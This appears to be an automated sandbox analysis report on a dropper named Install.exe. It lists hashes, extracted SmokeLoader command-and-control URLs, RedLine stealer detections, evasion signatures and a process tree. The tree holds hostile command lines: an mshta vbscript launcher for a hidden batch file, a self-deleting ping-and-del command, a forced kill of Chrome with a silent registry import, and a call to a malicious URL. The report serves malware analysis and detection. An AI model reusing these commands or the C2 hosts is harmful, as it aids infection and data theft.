Analysis
-
max time kernel
139s -
max time network
186s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20201028
General
-
Target
Install.exe
-
Size
852KB
-
MD5
98d1321a449526557d43498027e78a63
-
SHA1
d8584de7e33d30a8fc792b62aa7217d44332a345
-
SHA256
5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
-
SHA512
3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0
Malware Config
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral4/memory/6852-385-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral4/files/0x000100000001abc0-111.dat acprotect behavioral4/files/0x000100000001abc0-110.dat acprotect -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 16 IoCs
pid Process 3244 multitimer.exe 3488 multitimer.exe 640 multitimer.exe 1688 vict.exe 748 vm0a2bdegt4.exe 1768 IBInstaller_97039.exe 2904 askinstall24.exe 2880 vict.tmp 720 gi3tpwy1sjt.exe 808 1nwdsdrt3mu.exe 1332 safebits.exe 2772 IBInstaller_97039.tmp 2852 Setup3310.exe 1504 gi3tpwy1sjt.tmp 3624 vpn.exe 3296 chashepro3.exe -
resource yara_rule behavioral4/files/0x000100000001abc0-111.dat upx behavioral4/files/0x000100000001abc0-110.dat upx -
Loads dropped DLL 2 IoCs
pid Process 2880 vict.tmp 2772 IBInstaller_97039.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ey0mwzu0zha = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\FU4PL1TSUU\\multitimer.exe\" 1 3.1615014594.60432ac28c2e6" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 174 ipinfo.io 208 ipinfo.io 240 ipinfo.io 245 ipinfo.io 66 ipinfo.io 70 ipinfo.io 140 ipinfo.io 149 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Program crash 8 IoCs
pid pid_target Process procid_target 5372 488 WerFault.exe 123 5580 488 WerFault.exe 123 5704 488 WerFault.exe 123 6088 488 WerFault.exe 123 1400 5916 WerFault.exe 152 5524 488 WerFault.exe 123 1956 488 WerFault.exe 123 4120 488 WerFault.exe 123 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
pid Process 6960 timeout.exe 6992 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 5 IoCs
pid Process 5516 taskkill.exe 6588 TASKKILL.exe 6668 taskkill.exe 6736 taskkill.exe 5496 taskkill.exe -
Runs .reg file with regedit 2 IoCs
pid Process 6596 regedit.exe 6596 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6536 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 67 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 78 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 173 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 205 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 241 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe 640 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 8 Install.exe Token: SeDebugPrivilege 3244 multitimer.exe Token: SeDebugPrivilege 640 multitimer.exe Token: SeDebugPrivilege 748 vm0a2bdegt4.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 8 wrote to memory of 3244 8 Install.exe 75 PID 8 wrote to memory of 3244 8 Install.exe 75 PID 3244 wrote to memory of 3488 3244 multitimer.exe 80 PID 3244 wrote to memory of 3488 3244 multitimer.exe 80 PID 3488 wrote to memory of 640 3488 multitimer.exe 81 PID 3488 wrote to memory of 640 3488 multitimer.exe 81 PID 640 wrote to memory of 1688 640 multitimer.exe 82 PID 640 wrote to memory of 1688 640 multitimer.exe 82 PID 640 wrote to memory of 1688 640 multitimer.exe 82 PID 640 wrote to memory of 1768 640 multitimer.exe 84 PID 640 wrote to memory of 1768 640 multitimer.exe 84 PID 640 wrote to memory of 1768 640 multitimer.exe 84 PID 640 wrote to memory of 748 640 multitimer.exe 83 PID 640 wrote to memory of 748 640 multitimer.exe 83 PID 640 wrote to memory of 2904 640 multitimer.exe 128 PID 640 wrote to memory of 2904 640 multitimer.exe 128 PID 640 wrote to memory of 2904 640 multitimer.exe 128 PID 1688 wrote to memory of 2880 1688 vict.exe 127 PID 1688 wrote to memory of 2880 1688 vict.exe 127 PID 1688 wrote to memory of 2880 1688 vict.exe 127 PID 640 wrote to memory of 720 640 multitimer.exe 126 PID 640 wrote to memory of 720 640 multitimer.exe 126 PID 640 wrote to memory of 720 640 multitimer.exe 126 PID 640 wrote to memory of 808 640 multitimer.exe 89 PID 640 wrote to memory of 808 640 multitimer.exe 89 PID 640 wrote to memory of 1332 640 multitimer.exe 88 PID 640 wrote to memory of 1332 640 multitimer.exe 88 PID 640 wrote to memory of 1332 640 multitimer.exe 88 PID 1768 wrote to memory of 2772 1768 IBInstaller_97039.exe 85 PID 1768 wrote to memory of 2772 1768 IBInstaller_97039.exe 85 PID 1768 wrote to memory of 2772 1768 IBInstaller_97039.exe 85 PID 640 wrote to memory of 2852 640 multitimer.exe 87 PID 640 wrote to memory of 2852 640 multitimer.exe 87 PID 640 wrote to memory of 2852 640 multitimer.exe 87 PID 720 wrote to memory of 1504 720 gi3tpwy1sjt.exe 86 PID 720 wrote to memory of 1504 720 gi3tpwy1sjt.exe 86 PID 720 wrote to memory of 1504 720 gi3tpwy1sjt.exe 86 PID 640 wrote to memory of 3624 640 multitimer.exe 125 PID 640 wrote to memory of 3624 640 multitimer.exe 125 PID 640 wrote to memory of 3624 640 multitimer.exe 125 PID 640 wrote to memory of 3296 640 multitimer.exe 90 PID 640 wrote to memory of 3296 640 multitimer.exe 90 PID 640 wrote to memory of 3296 640 multitimer.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 0 3060197d33d91c80.94013368 0 1012⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 1 3.1615014594.60432ac28c2e6 1013⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FU4PL1TSUU\multitimer.exe" 2 3.1615014594.60432ac28c2e64⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe"C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe" /VERYSILENT /id=5355⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\is-EC290.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-EC290.tmp\vict.tmp" /SL5="$A0062,870426,780800,C:\Users\Admin\AppData\Local\Temp\2b5blq31kd5\vict.exe" /VERYSILENT /id=5356⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2880
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ejnv0pq2fh\vm0a2bdegt4.exe"C:\Users\Admin\AppData\Local\Temp\3ejnv0pq2fh\vm0a2bdegt4.exe" testparams5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe"C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe" /VERYSILENT /p=testparams6⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\is-FGMCO.tmp\yd4se4z3glg.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGMCO.tmp\yd4se4z3glg.tmp" /SL5="$7005A,404973,58368,C:\Users\Admin\AppData\Roaming\ocwl1yrr5ds\yd4se4z3glg.exe" /VERYSILENT /p=testparams7⤵PID:2188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\is-DR9FM.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-DR9FM.tmp\IBInstaller_97039.tmp" /SL5="$5002E,14452723,721408,C:\Users\Admin\AppData\Local\Temp\pnesj2gs5fr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe"7⤵PID:4980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-05SSA.tmp\{app}\chrome_proxy.exe"8⤵PID:6324
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 49⤵
- Runs ping.exe
PID:6536
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970397⤵PID:4932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe" /Verysilent /subid=5775⤵
- Executes dropped EXE
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\is-D2A2I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D2A2I.tmp\Setup3310.tmp" /SL5="$50058,802346,56832,C:\Users\Admin\AppData\Local\Temp\xmn4yuvwvv5\Setup3310.exe" /Verysilent /subid=5776⤵PID:416
-
C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe" /Verysilent7⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\is-PATG9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-PATG9.tmp\Setup.tmp" /SL5="$302C0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-7RPHJ.tmp\Setup.exe" /Verysilent8⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe" /Verysilent9⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\is-MH2AQ.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-MH2AQ.tmp\ProPlugin.tmp" /SL5="$204A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\ProPlugin.exe" /Verysilent10⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\is-HSC9R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HSC9R.tmp\Setup.exe"11⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"12⤵PID:5052
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe13⤵
- Kills process with taskkill
PID:6588
-
-
C:\Windows\regedit.exeregedit /s chrome.reg13⤵
- Runs .reg file with regedit
PID:6596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat13⤵PID:6796
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)14⤵PID:7064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"15⤵PID:4064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"16⤵PID:5632
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe4,0xe8,0xec,0xc0,0xf0,0x7ffe67056e00,0x7ffe67056e10,0x7ffe67056e2017⤵PID:2608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 /prefetch:817⤵PID:4968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:117⤵PID:6768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:117⤵PID:6788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2060 /prefetch:817⤵PID:6320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2004 /prefetch:217⤵PID:4324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:117⤵PID:1460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:117⤵PID:5128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:117⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:117⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:817⤵PID:7044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:817⤵PID:7124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:817⤵PID:6808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:817⤵PID:4188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:817⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings17⤵PID:8596
-
